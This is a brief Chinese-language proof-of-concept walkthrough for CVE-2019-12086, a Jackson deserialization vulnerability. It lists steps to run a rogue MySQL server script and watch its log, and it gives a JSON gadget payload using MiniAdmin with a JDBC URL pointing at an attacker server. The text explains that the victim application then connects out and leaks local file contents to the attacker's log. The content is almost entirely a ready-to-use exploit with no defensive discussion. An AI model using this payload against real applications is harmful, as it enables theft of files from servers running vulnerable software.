CVE-2019-12086 jackson unserialize
1、启动恶意MySQL服务器:
python rogue_mysql_server.py
2、在同一个目录下查看mysql.log:
tail -f mysql.log
3、向存在漏洞的应用发送如下json:
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
当jackson反序列化恶意json串后,会连接恶意MySQL服务器,被读取的文件内容会写入恶意服务器的mysql.log